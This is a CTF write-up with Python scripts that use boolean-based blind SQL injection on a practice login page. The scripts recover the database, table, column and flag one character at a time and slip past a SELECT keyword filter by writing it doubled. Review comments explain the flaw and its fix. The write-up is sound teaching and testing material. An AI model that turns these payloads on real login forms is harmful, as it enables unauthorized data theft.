经分析后可知：当输入 admin' and 1=3# 时返回为假 {"error":1,"msg":"\u8d26\u53f7\u4e0d\u5b58\u5728"}（即"账号不存在"）
当输入 admin' and 1=1# 时返回为真 {"error":1,"msg":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}（即"账号或密码错误"）。两种响应的 msg 不同，这一差异就是下面脚本判断注入条件真假的依据。
根据返回的字符串，我们可以写出对应的 Python 脚本
# Step 1: length of the current database name, found by boolean-based blind
# probing of the login form (see the two responses analysed above).
# NOTE(review): the oracle exists because the server answers "account does not
# exist" and "account or password wrong" with different messages; the injection
# itself presumably comes from SQL built by string concatenation from the `name`
# field. The server-side fix is a parameterized query plus one generic login error.
import string   # unused in this script
import requests
# Per-challenge instance URL used in the write-up.
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
# Tails of the JSON-escaped messages shown above: "...\u9519\u8bef" (错误) is the
# response reached when the injected condition is true, "...\u5b58\u5728" (不存在)
# when it is false.
true="u8bef"
false="u5728"   # declared but never tested; only `true` is checked below
# Try every candidate length; each hit is printed, the loop does not stop early.
for i in range(0,30):
    key="admin' and length(database())="+str(i)+"#"
    data={'name':key,'pass':'123'}
    r=requests.post(url,data=data).text
    if true in r:
        print("the length is",i)
# Step 2: recover the database name one character at a time.
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"    # tail of the "account or password wrong" message: condition true
false="u5728"   # unused; only `true` is tested
length=4        # presumably the value printed by the previous step (the name
                # hard-coded later in the write-up, 'note', is 4 characters long)
name=""
# Candidate alphabet. NOTE(review): unused here — the inner loop walks the ASCII
# range 32..127 directly.
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
    for j in range(32,128):
        # Compare position i of database() against ASCII code j.
        key="admin' and ascii(substr(database(),%d,1))=%d#"%(i,j)
        data={'name':key,'pass':'123'}
        r=requests.post(url,data=data).text
        if true in r:
            name=name+chr(j)
            print(name)   # prints the prefix recovered so far
# Step 3: length of the first table name in the 'note' schema.
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"    # tail of the "account or password wrong" message: condition true
false="u5728"   # unused; only `true` is tested
length=4        # carried over from the previous script; unused here
name=""         # unused here
database="note" # presumably the name recovered in step 2; the query below
                # hard-codes 'note' instead of using this variable
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"   # unused here
for i in range(1,30):
    # NOTE(review): the SELECT keyword is written mangled ("seselectlect"), which
    # hints at a keyword filter on the login handler; keyword filtering is not a
    # substitute for parameterized queries.
    key="admin' and length((seselectlect table_name FROM information_schema.tables WHERE table_schema='note' limit 0,1))="+str(i)+"#"
    data={'name':key,'pass':'123'}
    r=requests.post(url,data=data).text
    if true in r:
        print("the length of table is:",i)
# Step 4: recover the first table name in the 'note' schema character by character.
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"    # tail of the "account or password wrong" message: condition true
false="u5728"   # unused; only `true` is tested
length=4        # presumably the table-name length printed by step 3
name=""         # declared but never appended to in this script
database="note" # unused here; the query hard-codes 'note'
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"   # unused here
for i in range(1,length+1):
    for j in range(32,128):
        # Same mangled SELECT as in step 3; compare position i against ASCII code j.
        key="admin' and ascii(substr((seselectlect table_name FROM information_schema.tables WHERE table_schema='note' limit 0,1),%d,1))=%d#"%(i,j)
        data={'name':key,'pass':'123'}
        r=requests.post(url,data=data).text
        if true in r:
            # Each matched character is printed on its own line rather than
            # accumulated into `name`.
            print(chr(j))
# Step 5: length of the first column name of table 'fl4g'.
import string
import requests
url="http://e2cc3e08-20a0-4b33-a33d-a1a1ece4a063.node3.buuoj.cn/login.php"
true="u8bef"    # tail of the "account or password wrong" message: condition true
false="u5728"   # unused; only `true` is tested
length=4        # unused here
name=""         # unused here
database="note" # unused here
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"   # unused here
for i in range(0,30):
    # 'fl4g' is presumably the table name recovered in step 4.
    key="admin' and length((seselectlect column_name FROM information_schema.columns WHERE table_name='fl4g' limit 0,1))="+str(i)+"#"
    data={'name':key,'pass':'123'}
    r=requests.post(url,data=data).text
    if true in r:
        # (sic) "conlumn" is a typo in the output text.
        print("the length of conlumn of 'fl4g' is:",i)
# Step 6: recover the first column name of table 'fl4g' character by character.
import string
import requests
# NOTE(review): a different instance id than steps 1-5 (presumably a re-created
# challenge instance).
url="http://624475d0-c1d1-4457-9cf0-4a6967a5ac83.node3.buuoj.cn/login.php"
true="u8bef"    # tail of the "account or password wrong" message: condition true
false="u5728"   # unused; only `true` is tested
length=4        # presumably the column-name length printed by step 5
name=""
database="note" # unused here
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"   # unused here
for i in range(1,length+1):
    for j in range(32,128):
        # Compare position i of the column name against ASCII code j.
        key="admin' and ascii(substr((seselectlect column_name FROM information_schema.columns WHERE table_name='fl4g' limit 0,1),%d,1))=%d#"%(i,j)
        data={'name':key,'pass':'123'}
        r=requests.post(url,data=data).text
        if true in r:
            name=name+chr(j)
            print(name)   # prints the prefix recovered so far
# Step 7: length of the value in column 'flag' of table 'fl4g'.
import string
import requests
url="http://624475d0-c1d1-4457-9cf0-4a6967a5ac83.node3.buuoj.cn/login.php"
true="u8bef"    # tail of the "account or password wrong" message: condition true
false="u5728"   # unused; only `true` is tested
length=4        # unused here
name=""         # unused here
database="note" # unused here
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"   # unused here
for i in range(0,60):
    # 'flag' is presumably the column name recovered in step 6.
    key="admin' and length((seselectlect flag from fl4g limit 0,1))="+str(i)+"#"
    data = {'name': key, 'pass': '123'}
    r = requests.post(url, data=data).text
    if true in r:
        print("the length of column is:",i)
# Step 8: recover the flag value character by character.
import string
import requests
url="http://624475d0-c1d1-4457-9cf0-4a6967a5ac83.node3.buuoj.cn/login.php"
true="u8bef"    # tail of the "account or password wrong" message: condition true
false="u5728"   # unused; only `true` is tested
length=26       # presumably the value-length printed by step 7
flag=""
database="note" # unused here
# Candidate alphabet; unlike the earlier scripts this one is actually iterated.
# A character outside `dic` never matches and is silently skipped at that position.
dic=string.ascii_letters+string.digits+"~!@#$%^&*()_+-={}"
for i in range(1,length+1):
    for j in dic:
        # Position i is formatted in with %d; the ASCII code of candidate j is
        # appended as a separate string.
        key="admin' and (ascii(substr((seselectlect flag FROM fl4g limit 0,1),%d,1))="%i+str(ord(j))+")#"
        data={'name':key,'pass':'123'}
        r=requests.post(url,data=data).text
        if true in r:
            flag=flag+j
            print(flag)   # prints the prefix recovered so far